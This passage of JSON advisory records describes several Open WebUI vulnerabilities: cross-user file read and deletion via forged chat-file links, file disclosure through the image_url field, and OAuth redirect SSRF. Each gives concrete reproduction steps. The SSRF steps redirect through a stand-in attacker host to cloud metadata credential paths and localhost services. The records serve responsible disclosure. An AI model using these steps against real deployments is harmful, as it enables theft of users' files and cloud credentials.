`loose`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:14:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-v8qj-hxv7-mgvv","https://nvd.nist.gov/vuln/detail/CVE-2026-54011","https://github.com/advisories/GHSA-v8qj-hxv7-mgvv","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2759.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-v8qj-hxv7-mgvv","CVE-2026-54011"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.441Z","epss_percentage":0.00336,"epss_percentile":0.2602,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OHFqLWh4djctbWd2ds4ABY4f","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OHFqLWh4djctbWd2ds4ABY4f","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OHFqLWh4djctbWd2ds4ABY4f/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cmhjLTNmcjYtcGMzY84ABY4e","url":"https://github.com/advisories/GHSA-vrhc-3fr6-pc3c","title":"Open WebUI: Forged chat-file link allows cross-user file read and deletion","description":"## Summary\n\nOpen WebUI `v0.9.5` lets an authenticated user attach arbitrary `file_id` values to their own chat message without checking whether they own or can read those files. If the attacker then shares that chat and grants themselves read access, `has_access_to_file()` treats the victim file as accessible through the shared chat, and the file endpoints read or delete the victim file.\n\n## Impact\n\nSecurity boundary crossed: file confidentiality and integrity.\n\nAn authenticated attacker who knows or obtains a victim `file_id` can make Open WebUI authorize, through an attacker-owned shared chat:\n\n- reading the victim file via `GET /api/v1/files/{id}/content`, and\n- deleting the victim file via `DELETE /api/v1/files/{id}`.\n\n## Root Cause\n\nClient-controlled message file IDs are persisted without file authorization checks:\n\n```python\n# backend/open_webui/main.py\nawait Chats.insert_chat_files(\n    chat_id,\n    user_message.get('id'),\n    [\n        file_item.get('id')\n        for file_item in user_message_files\n        if file_item.get('type') == 'file'\n    ],\n    user.id,\n)\n```\n\n`insert_chat_files()` stores the provided IDs directly:\n\n```python\n# backend/open_webui/models/chats.py\nChatFileModel(\n    user_id=user_id,\n    chat_id=chat_id,\n    message_id=message_id,\n    file_id=file_id,\n)\n```\n\nLater, file authorization trusts shared-chat associations:\n\n```python\n# backend/open_webui/utils/access_control/files.py\nshared_chat_ids = await Chats.get_shared_chat_ids_by_file_id(file_id, db=db)\nif shared_chat_ids:\n    accessible_ids = await AccessGrants.get_accessible_resource_ids(\n        user_id=user.id,\n        resource_type='shared_chat',\n        resource_ids=shared_chat_ids,\n        permission='read',\n    )\n    if accessible_ids:\n        return True\n```\n\nThe download endpoint uses this helper:\n\n```python\n# backend/open_webui/routers/files.py\nif file.user_id == user.id or user.role == 'admin' or await has_access_to_file(id, 'read', user, db=db):\n    return FileResponse(file_path, ...)\n```\n\nOn affected versions this shared-chat branch is not gated on `access_type` (the grant lookup hardcodes `permission='read'`, but nothing checks that the request itself is a read). The same forged association therefore also satisfies the `write` check that `DELETE /api/v1/files/{id}` performs, so the attacker can delete the victim file, not only read it.\n\nBecause the shared-chat branch ignores `access_type`, the deletion does not require the forged association at all. A user granted only **read** access to a chat that the owner legitimately shared can delete the owner's own files attached to that chat via `DELETE /api/v1/files/{id}`, since the read grant satisfies the `write` check. The forged association (above) broadens this to any victim `file_id`; a legitimate read-only share reaches it without any forgery.\n\n## PoC\n\n1. Attacker creates or uses a chat they own.\n2. Attacker sends `POST /api/chat/completions` or `POST /api/v1/chat/completions` where top-level `user_message.files` contains:\n\n```json\n[\n  {\n    \"type\": \"file\",\n    \"id\": \"VICTIM_FILE_ID\"\n  }\n]\n```\n\n3. Backend inserts a `chat_file` row linking the attacker chat to `VICTIM_FILE_ID`.\n4. Attacker shares the chat and grants read access to themselves or public access.\n5. Attacker requests:\n\n```text\nGET /api/v1/files/VICTIM_FILE_ID/content\n```\n\nExpected: 404/403 because the attacker does not own or otherwise have access to the victim file.\n\nActual: file authorization succeeds through the attacker-controlled shared-chat association.\n\n## Local Verification\n\nI verified the bug locally with Open WebUI's real `Chats.insert_chat_files()` and real `has_access_to_file()` implementations. The harness uses fake DB adapters only to avoid this environment's async SQLite hang; the security-sensitive logic under test is the application code.\n\nResult:\n\n```json\n{\n  \"before_chat_file_link_attacker_can_read\": false,\n  \"insert_sink\": {\n    \"db_commit_called\": true,\n    \"insert_returned_rows\": true,\n    \"stored_chat_ids\": [\n      \"attacker-chat\"\n    ],\n    \"stored_file_ids\": [\n      \"victim-file\"\n    ],\n    \"stored_user_ids\": [\n      \"attacker\"\n    ]\n  },\n  \"after_attacker_shared_chat_links_victim_file_attacker_can_read\": true,\n  \"confirmed\": true\n}\n```\n\nPoC:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVerifier for chat-file link authorization bypass.\n\nThis intentionally avoids the app DB because the local Python 3.13 async SQLite\nstack hangs in this checkout. It still executes Open WebUI's real\nhas_access_to_file() implementation, with fake model adapters standing in for\nthe DB tables.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\n\ndef prepare_imports() -\u003e None:\n    repo_root = Path(__file__).resolve().parents[1]\n    sys.path.insert(0, str(repo_root / \"backend\"))\n    os.environ[\"VECTOR_DB\"] = \"none\"\n\n    class DummyTyper:\n        def command(self, *args, **kwargs):\n            return lambda fn: fn\n\n    sys.modules.setdefault(\n        \"typer\",\n        types.SimpleNamespace(\n            Typer=lambda *args, **kwargs: DummyTyper(),\n            Option=lambda *args, **kwargs: None,\n            echo=lambda *args, **kwargs: None,\n            Exit=Exception,\n        ),\n    )\n    sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeFiles:\n    async def get_file_by_id(self, file_id, db=None):\n        if file_id == \"victim-file\":\n            return SimpleNamespace(\n                id=\"victim-file\",\n                user_id=\"victim\",\n                meta={},\n            )\n        return None\n\n\nclass FakeKnowledges:\n    async def get_knowledges_by_file_id(self, file_id, db=None):\n        return []\n\n\nclass FakeGroups:\n    async def get_groups_by_member_id(self, user_id, db=None):\n        return []\n\n\nclass FakeChannels:\n    async def get_channels_by_file_id_and_user_id(self, file_id, user_id, db=None):\n        return []\n\n\nclass FakeModels:\n    async def get_models_by_user_id(self, user_id, permission=\"read\", db=None):\n        return []\n\n\nclass FakeChats:\n    def __init__(self, linked: bool):\n        self.linked = linked\n\n    async def get_shared_chat_ids_by_file_id(self, file_id, db=None):\n        if self.linked and file_id == \"victim-file\":\n            # This mirrors a chat_file row tying victim-file to the attacker's\n            # shared chat. The real insertion sink is Chats.insert_chat_files().\n            return [\"attacker-chat\"]\n        return []\n\n\nclass FakeAccessGrants:\n    def __init__(self, granted: bool):\n        self.granted = granted\n\n    async def has_access(self, *args, **kwargs):\n        return False\n\n    async def get_accessible_resource_ids(\n        self,\n        user_id,\n        resource_type,\n        resource_ids,\n        permission=\"read\",\n        user_group_ids=None,\n        db=None,\n    ):\n        if (\n            self.granted\n            and user_id == \"attacker\"\n            and resource_type == \"shared_chat\"\n            and \"attacker-chat\" in resource_ids\n            and permission == \"read\"\n        ):\n            return {\"attacker-chat\"}\n        return set()\n\n\nclass FakeDb:\n    def __init__(self):\n        self.added = []\n        self.committed = False\n\n    def add_all(self, rows):\n        self.added.extend(rows)\n\n    async def commit(self):\n        self.committed = True\n\n\nclass FakeDbContext:\n    def __init__(self, db):\n        self.db = db\n\n    async def __aenter__(self):\n        return self.db\n\n    async def __aexit__(self, exc_type, exc, tb):\n        return False\n\n\nasync def verify_insert_sink_accepts_victim_file_id():\n    import open_webui.models.chats as chats_module\n\n    fake_db = FakeDb()\n    chats_table = chats_module.Chats\n\n    original_context = chats_module.get_async_db_context\n    original_existing = chats_table.get_chat_files_by_chat_id_and_message_id\n\n    async def fake_existing(self, chat_id, message_id, db=None):\n        return []\n\n    try:\n        chats_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n        chats_table.get_chat_files_by_chat_id_and_message_id = types.MethodType(fake_existing, chats_table)\n\n        inserted = await chats_table.insert_chat_files(\n            chat_id=\"attacker-chat\",\n            message_id=\"attacker-message\",\n            file_ids=[\"victim-file\"],\n            user_id=\"attacker\",\n        )\n    finally:\n        chats_module.get_async_db_context = original_context\n        chats_table.get_chat_files_by_chat_id_and_message_id = original_existing\n\n    return {\n        \"insert_returned_rows\": bool(inserted),\n        \"db_commit_called\": fake_db.committed,\n        \"stored_file_ids\": [getattr(row, \"file_id\", None) for row in fake_db.added],\n        \"stored_chat_ids\": [getattr(row, \"chat_id\", None) for row in fake_db.added],\n        \"stored_user_ids\": [getattr(row, \"user_id\", None) for row in fake_db.added],\n    }\n\n\nasync def main() -\u003e None:\n    prepare_imports()\n\n    import open_webui.utils.access_control.files as file_acl\n\n    attacker = SimpleNamespace(id=\"attacker\", role=\"user\")\n\n    original = {\n        \"Files\": file_acl.Files,\n        \"Knowledges\": file_acl.Knowledges,\n        \"Groups\": file_acl.Groups,\n        \"Channels\": file_acl.Channels,\n        \"Chats\": file_acl.Chats,\n        \"Models\": file_acl.Models,\n        \"AccessGrants\": file_acl.AccessGrants,\n    }\n\n    try:\n        file_acl.Files = FakeFiles()\n        file_acl.Knowledges = FakeKnowledges()\n        file_acl.Groups = FakeGroups()\n        file_acl.Channels = FakeChannels()\n        file_acl.Models = FakeModels()\n\n        file_acl.Chats = FakeChats(linked=False)\n        file_acl.AccessGrants = FakeAccessGrants(granted=False)\n        before = await file_acl.has_access_to_file(\"victim-file\", \"read\", attacker)\n\n        file_acl.Chats = FakeChats(linked=True)\n        file_acl.AccessGrants = FakeAccessGrants(granted=True)\n        after = await file_acl.has_access_to_file(\"victim-file\", \"read\", attacker)\n\n        insert_sink = await verify_insert_sink_accepts_victim_file_id()\n\n        result = {\n            \"victim_file_id\": \"victim-file\",\n            \"victim_file_owner\": \"victim\",\n            \"attacker_id\": \"attacker\",\n            \"attacker_owns_file\": False,\n            \"insert_sink\": insert_sink,\n            \"before_chat_file_link_attacker_can_read\": before,\n            \"after_attacker_shared_chat_links_victim_file_attacker_can_read\": after,\n            \"confirmed\": (\n                before is False\n                and after is True\n                and insert_sink[\"insert_returned_rows\"] is True\n                and insert_sink[\"stored_file_ids\"] == [\"victim-file\"]\n                and insert_sink[\"stored_user_ids\"] == [\"attacker\"]\n            ),\n            \"sink\": \"Chats.insert_chat_files() accepts caller-supplied file_ids without checking file ownership/read access\",\n        }\n        print(json.dumps(result, indent=2, sort_keys=True))\n    finally:\n        for name, value in original.items():\n            setattr(file_acl, name, value)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\n## Recommended Fix\n\nBefore calling `Chats.insert_chat_files()`, filter `user_message.files` to files the caller owns or can read:\n\n```python\nallowed_file_ids = []\nfor file_id in requested_file_ids:\n    file = await Files.get_file_by_id(file_id)\n    if file and (file.user_id == user.id or user.role == 'admin' or await has_access_to_file(file_id, 'read', user)):\n        allowed_file_ids.append(file_id)\n```\n\nAlso consider enforcing this inside `Chats.insert_chat_files()` so future call sites cannot create unauthorized `chat_file` associations.\n\nAdditionally, the shared-chat branch of `has_access_to_file()` should honour `access_type`, so a read grant cannot satisfy the write check used by file deletion.\n\n## Consolidation\n\nPer Open WebUI's Report Handling policy this consolidates independent reports of the same chat-file authorization flaws into one advisory and CVE:\n\n- Cross-user file READ via a forged `chat_file` association (`GET /api/v1/files/{id}/content`): @0xEr3n. Fixed by #25054, which gates `Chats.insert_chat_files()` so a caller can only link files they own or can read.\n- Cross-user file DELETION via the shared-chat branch ignoring `access_type` (`DELETE /api/v1/files/{id}`): reported independently by @oxsignal (earliest filing; reached via a legitimately read-only-shared chat, no forged association needed), by @0xEr3n (via the forged association), and by @5yu4n. Fixed by #24755, which makes the shared-chat branch honour `access_type`.\n\nAffected: `\u003c= 0.9.5`. Patched: `\u003e= 0.9.6`. One CVE for the consolidated advisory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:12:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-vrhc-3fr6-pc3c","https://github.com/open-webui/open-webui/pull/24755","https://github.com/open-webui/open-webui/pull/25054","https://nvd.nist.gov/vuln/detail/CVE-2026-54010","https://github.com/advisories/GHSA-vrhc-3fr6-pc3c","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2763.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-vrhc-3fr6-pc3c","CVE-2026-54010"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.442Z","epss_percentage":0.0042,"epss_percentile":0.34735,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cmhjLTNmcjYtcGMzY84ABY4e","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cmhjLTNmcjYtcGMzY84ABY4e","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cmhjLTNmcjYtcGMzY84ABY4e/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13Y2g4LW1oajUtOWZyZ84ABY4d","url":"https://github.com/advisories/GHSA-wch8-mhj5-9frg","title":"Open WebUI: Cross-user file disclosure via /api/chat/completions image_url field","description":"## summary\n\n`POST /api/chat/completions` accepts an `image_url.url` value that, when it does NOT start with `http://`, `https://`, or `data:image/`, is interpreted as a file id and resolved against the global file table with no ownership check. An authenticated user can therefore set `image_url.url` to another user's file id, the server reads that file from disk, base64-encodes it, and injects the data URI into the LLM request. The user then prompts the LLM to describe / OCR the file and reads the content back.\n\nSame class as CVE-2026-44560 (RAG cross-user access) and the multiple `has_access_to_file` checks added in `routers/files.py` -- the auth boundary was tightened on the file router but not on this conversion path.\n\n## affected code\n\n`backend/open_webui/utils/middleware.py:2113-2150` -- `convert_url_images_to_base64`:\n\n```python\nasync def convert_url_images_to_base64(form_data):\n    messages = form_data.get('messages', [])\n    for message in messages:\n        content = message.get('content')\n        if not isinstance(content, list):\n            continue\n        new_content = []\n        for item in content:\n            if not isinstance(item, dict) or item.get('type') != 'image_url':\n                new_content.append(item)\n                continue\n            image_url = item.get('image_url', {}).get('url', '')\n            if image_url.startswith('data:image/'):\n                new_content.append(item)\n                continue\n            try:\n                base64_data = await get_image_base64_from_url(image_url)  # \u003c-- no `user` passed\n                if base64_data:\n                    new_content.append({'type': 'image_url',\n                                        'image_url': {'url': base64_data}})\n```\n\ncalled from the main chat completion middleware at `middleware.py:2357`:\n\n```python\nform_data = await convert_url_images_to_base64(form_data)\n```\n\n`backend/open_webui/utils/files.py:57-95` -- `get_image_base64_from_url`:\n\n```python\nasync def get_image_base64_from_url(url: str) -\u003e Optional[str]:\n    try:\n        if url.startswith('http'):\n            validate_url(url)\n            # ... SSRF-safe fetch with allow_redirects=AIOHTTP_CLIENT_ALLOW_REDIRECTS ...\n        else:\n            file = await Files.get_file_by_id(url)        # \u003c-- NO user_id filter\n            if not file:\n                return None\n            file_path = await asyncio.to_thread(Storage.get_file, file.path)\n            file_path = Path(file_path)\n            if file_path.is_file():\n                with open(file_path, 'rb') as image_file:\n                    encoded_string = base64.b64encode(image_file.read()).decode('utf-8')\n                    content_type = mimetypes.guess_type(file_path.name)[0] or (file.meta or {}).get('content_type')\n                    ...\n                    return f'data:{content_type};base64,{encoded_string}'\n```\n\n`Files.get_file_by_id` in `models/files.py:161` does a bare `db.get(File, id)` -- no ownership filter. there is a separate `Files.get_file_by_id_and_user_id` at line 172 that does filter on `user_id`, and the file router uses `has_access_to_file(id, 'read', user, db)` at `routers/files.py:626` etc. neither check exists on this path.\n\n## reproduction\n\n1. As user A, upload any file (image works cleanly, pdf works if a vision-capable model is configured). Note the file id from the upload response, e.g. `c7f1d8e3-...`.\n2. As user B, POST to `/api/v1/chat/completions` with body:\n\n```json\n{\n  \"model\": \"\u003cany vision model\u003e\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        {\"type\": \"text\", \"text\": \"transcribe everything you can see in this image\"},\n        {\"type\": \"image_url\", \"image_url\": {\"url\": \"c7f1d8e3-...\"}}\n      ]\n    }\n  ]\n}\n```\n\nServer reads user A's file from disk, base64-encodes it, and sends to the LLM as user B's image attachment. LLM response contains the file content.\n\n## file id discovery\n\nFile ids are UUIDs and not enumerable directly, but they leak via:\n\n- shared chats / channels containing the original upload\n- knowledge base members can see ids of files contributed by others\n- a user who can read a folder index sees the file ids of files inside\n- chat history exports (`/api/v1/chats/{id}`) include file ids\n- the user themselves can be tricked into pasting / sharing an id (less likely)\n\n## impact\n\nAny authenticated user can read any other user's file content (image and any file with an image-guess mimetype path) via this channel. Severity is bounded by what the LLM will accept in `image_url` -- in practice, image files work cleanly with any vision model; pdf / docx work with multi-modal providers that accept them.\n\n## suggested fix\n\nThread the authenticated user through to `get_image_base64_from_url` and resolve the file via `Files.get_file_by_id_and_user_id(id, user.id)` (or `has_access_to_file(id, 'read', user, db)` if shared-via-knowledge-base access is intended). Same pattern that's already used in `routers/files.py:626` and elsewhere.\n\nminimal patch sketch:\n\n```diff\n--- a/backend/open_webui/utils/files.py\n+++ b/backend/open_webui/utils/files.py\n@@ -57,7 +57,7 @@\n-async def get_image_base64_from_url(url: str) -\u003e Optional[str]:\n+async def get_image_base64_from_url(url: str, user=None) -\u003e Optional[str]:\n     try:\n         if url.startswith('http'):\n             ...\n         else:\n-            file = await Files.get_file_by_id(url)\n+            file = (await Files.get_file_by_id_and_user_id(url, user.id)\n+                    if user is not None else None)\n+            if file is None:\n+                # fall back to access-grant check for shared files\n+                file = await Files.get_file_by_id(url)\n+                if file and not await has_access_to_file(url, 'read', user):\n+                    return None\n```\n\nand pipe `user` through `convert_url_images_to_base64(form_data, user)` from the middleware caller. happy to send a PR once you confirm the fix shape you want.\n\n## variant note\n\nthis was found via patch-diffing existing advisories. the same bug class likely exists in any other site that calls `Files.get_file_by_id` without an adjacent `has_access_to_file` / `get_file_by_id_and_user_id` check. quick grep:\n\n```\ngit grep -n 'Files\\.get_file_by_id(' -- 'backend/open_webui/**'\n```\n\nworth a sweep across utils/ and routers/ for missed sites.\n\n## environment\n\nOpen-webui main branch as of commit `3660bc0` (2026-05-10). python 3.x backend. confirmed by reading the source; no instance stood up.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:11:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-wch8-mhj5-9frg","https://nvd.nist.gov/vuln/detail/CVE-2026-54009","https://github.com/advisories/GHSA-wch8-mhj5-9frg","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2766.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-wch8-mhj5-9frg","CVE-2026-54009"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.444Z","epss_percentage":0.00382,"epss_percentile":0.31002,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13Y2g4LW1oajUtOWZyZ84ABY4d","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13Y2g4LW1oajUtOWZyZ84ABY4d","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13Y2g4LW1oajUtOWZyZ84ABY4d/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yMjZmLWYyNGctNTI0d84ABY4c","url":"https://github.com/advisories/GHSA-226f-f24g-524w","title":"Open WebUI: Redirect-Bypass SSRF in OAuth `_process_picture_url` (incomplete-fix sibling of CVE-2026-45401)","description":"## Summary\n\n`backend/open_webui/utils/oauth.py::_process_picture_url` (v0.9.5, lines 1435-1470) calls `validate_url(picture_url)` on the initial URL only, then invokes `aiohttp.ClientSession.get(picture_url, ...)` without `allow_redirects=False`. aiohttp's default is `allow_redirects=True, max_redirects=10`; the function does not pass the project's `AIOHTTP_CLIENT_ALLOW_REDIRECTS` env constant either. An attacker with a valid OAuth IdP identity can therefore submit a public URL that 302-redirects to an internal address and read the internal response body via the attacker's own `profile_image_url` field.\n\nThis is the same redirect-bypass class as CVE-2026-45401 (GHSA-rh5x-h6pp-cjj6), on a 6th call site that the v0.9.5 patch missed. CVE-2026-45401's advisory body enumerates exactly five affected paths â€” `SafeWebBaseLoader._scrape`, `_fetch`, `get_content_from_url`, `load_url_image`, `get_image_base64_from_url` â€” none in `utils/oauth.py`.\n\n## Vulnerable code (v0.9.5)\n\n`backend/open_webui/utils/oauth.py`, lines 1435-1470:\n\n```python\nasync def _process_picture_url(self, picture_url: str, access_token: str = None) -\u003e str:\n    if not picture_url:\n        return '/user.png'\n    try:\n        validate_url(picture_url)                              # initial URL only\n\n        get_kwargs = {}\n        if access_token:\n            get_kwargs['headers'] = {'Authorization': f'Bearer {access_token}'}\n        async with aiohttp.ClientSession(trust_env=True) as session:\n            async with session.get(picture_url, **get_kwargs,\n                                   ssl=AIOHTTP_CLIENT_SESSION_SSL) as resp:\n            #                       ^^^^^^^^^^^ no allow_redirects=False\n                if resp.ok:\n                    picture = await resp.read()\n                    base64_encoded_picture = base64.b64encode(picture).decode('utf-8')\n                    guessed_mime_type = mimetypes.guess_type(picture_url)[0]\n                    if guessed_mime_type is None:\n                        guessed_mime_type = 'image/jpeg'\n                    return f'data:{guessed_mime_type};base64,{base64_encoded_picture}'\n                ...\n```\n\nThe function is invoked at `oauth.py:1556` (new-user OAuth signup) and `oauth.py:1536` (existing-user picture update on login). Neither call site re-validates after redirect-following.\n\n`backend/open_webui/retrieval/web/utils.py` (v0.9.5) imports the env constant `AIOHTTP_CLIENT_ALLOW_REDIRECTS` at line 51 and uses it on the five paths patched by CVE-2026-45401. `utils/oauth.py` does not import or reference it.\n\n## Exploitation\n\n**Preconditions:**\n- `ENABLE_OAUTH_SIGNUP=true` or `OAUTH_UPDATE_PICTURE_ON_LOGIN=true` (common in production OAuth-IdP deployments)\n- Attacker has a valid identity on the configured OAuth IdP (Google, Microsoft, GitHub, or any generic OIDC provider)\n\n**Steps:**\n\n1. Attacker hosts a redirect endpoint at `http://attacker.example/r` on a public IP. `validate_url(\"http://attacker.example/r\")` returns True (`is_global=True` for public IPs).\n2. Attacker sets their IdP `picture` claim to `http://attacker.example/r`.\n3. Attacker signs in to open-webui via OAuth. open-webui invokes `_process_picture_url(\"http://attacker.example/r\", ...)`.\n4. `validate_url` accepts the public URL. `session.get(\"http://attacker.example/r\")` is invoked.\n5. attacker.example responds `HTTP/1.1 302 Found\\r\\nLocation: http://127.0.0.1:11434/api/tags`. (Or `http://169.254.169.254/latest/meta-data/iam/security-credentials/`, RFC1918 internal services, etc.)\n6. aiohttp follows the redirect server-side. **No re-validation.**\n7. The internal response body is read into `picture`, base64-encoded, and stored as `profile_image_url = \"data:image/jpeg;base64,...\"` on the attacker's account.\n8. Attacker reads back via `GET /api/v1/auths/`. Decode the base64 payload to get the full internal response body.\n\n## Impact\n\nFull-read SSRF, identical read-back primitive to CVE-2026-45338:\n\n- Cloud metadata services (AWS IMDSv1 at `169.254.169.254`, GCP `metadata.google.internal`, Azure IMDS) â†’ IAM credentials, managed-identity tokens\n- Localhost-bound services (Ollama at `:11434`, Redis, Elasticsearch, internal Postgres exporters)\n- RFC1918 internal infrastructure not exposed to the internet\n\n## Distinction from prior CVEs\n\n| Prior CVE | This finding | Distinguishing fact |\n|---|---|---|\n| CVE-2026-45338 (GHSA-24c9) | `_process_picture_url` had no `validate_url()` call at all | Fixed in v0.9.0 by adding the call. Ours is the call being insufficient because it doesn't loop over redirect targets. Different mechanism, different fix. |\n| CVE-2026-45400 (GHSA-8w7q) | `validate_url()` had urlparse-vs-requests parser disagreement on `\\@` chars | Fixed in v0.9.5 by char-blocklist. Ours is post-validation redirect-following â€” orthogonal mechanism. |\n| CVE-2026-45401 (GHSA-rh5x) | Five paths in retrieval, routers/images, utils/files, utils/middleware | Parent class. Same CWE-918 redirect-bypass mechanism. `utils/oauth.py::_process_picture_url` is not among the five paths in the parent advisory's \"Affected code paths\" section. Same class, missed sink. Direct sibling. |\n\n## Suggested fix\n\n```python\nasync with session.get(\n    picture_url,\n    **get_kwargs,\n    ssl=AIOHTTP_CLIENT_SESSION_SSL,\n    allow_redirects=AIOHTTP_CLIENT_ALLOW_REDIRECTS,   # add\n) as resp:\n```\n\nOr, if redirects must remain enabled by default, wrap in a manual-follow loop that re-invokes `validate_url()` on each `Location` header. This mirrors the fix shape applied to the five paths in CVE-2026-45401.\n\n## Affected versions\n\nVulnerable: `\u003c= 0.9.5`\nFix: 0.9.6\n\n## References\n\n- CVE-2026-45401 / GHSA-rh5x-h6pp-cjj6 (parent cluster, redirect-bypass on 5 paths)\n- CVE-2026-45338 / GHSA-24c9-2m8q-qhmh (original `_process_picture_url` SSRF, patched v0.9.0)\n- CVE-2026-45400 / GHSA-8w7q-q5jp-jvgx (`validate_url` parser-disagreement bypass, patched v0.9.5)\n- open-webui issue #24560 (corroborates that the v0.9.5 redirect-fix was applied piecemeal across call sites)\n\n## Proof of Concept\n\nEnd-to-end PoC executed against `ghcr.io/open-webui/open-webui:v0.9.5` in Docker compose. Three services: attacker (OIDC IdP + 302-redirect endpoint on `evil.example.com:9001/redirect`), canary (internal target on `internal-target.local:9002/sentinel`), open-webui v0.9.5.\n\nFresh-CSPRNG sentinel generated **after** OAuth state-establishing call (per Gate 5.5 oracle protocol): `SSRF-POC-5580111b2a0d7d0c8324bfa92a0d9d09`.\n\nResult:\n- `profile_image_url` field after OAuth login: `data:image/jpeg;base64,U1NSRi1QT0MtNTU4MDExMWIyYTBkN2QwYzgzMjRiZmE5MmEwZDlkMDk=`\n- Base64 decode: `SSRF-POC-5580111b2a0d7d0c8324bfa92a0d9d09` (byte-for-byte sentinel match)\n- Canary log: `!!! SSRF HIT - sentinel served`\n\nChain confirmed: OAuth login â†’ IdP returns picture claim `evil.example.com:9001/redirect` â†’ `validate_url()` accepts FQDN â†’ `aiohttp.ClientSession.get(...)` follows 302 to `internal-target.local:9002/sentinel` server-side without re-validation â†’ response body base64-encoded into attacker's `profile_image_url` â†’ readable via `GET /api/v1/auths/`.\n\nPoC artifacts (compose, attacker server, canary, run/verify scripts, full transcript) available on request.\n\n## Reporter\n\nMatteo Panzeri â€” GitHub: `matte1782`, contact: `matteo1782@gmail.com`. Requesting CVE credit as **Matteo Panzeri**.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:10:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-226f-f24g-524w","https://github.com/advisories/GHSA-226f-f24g-524w"],"source_kind":"github","identifiers":["GHSA-226f-f24g-524w","CVE-2026-54008"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.445Z","epss_percentage":0.00326,"epss_percentile":0.24874,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yMjZmLWYyNGctNTI0d84ABY4c","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yMjZmLWYyNGctNTI0d84ABY4c","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yMjZmLWYyNGctNTI0d84ABY4c/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zdnY1LTh4eHAtNGY1Nc4ABY4b","url":"https://github.com/advisories/GHSA-3vv5-8xxp-4f55","title":"Open WebUI: Cross-origin postMessage confirmation bypass via action:submit","description":"### Summary\n\nThe chat message listener allows non-same-origin `input:prompt` and `action:submit` messages, so an external site can set prompt text and trigger `submitPrompt()` in an authenticated victim session. I validated this with a cross-origin attacker page that auto-posted messages and caused unauthorized `POST /api/v1/chats/new` and `POST /api/chat/completions` requests containing attacker-controlled prompts. This enables cross-site forced actions and model/tool execution under victim 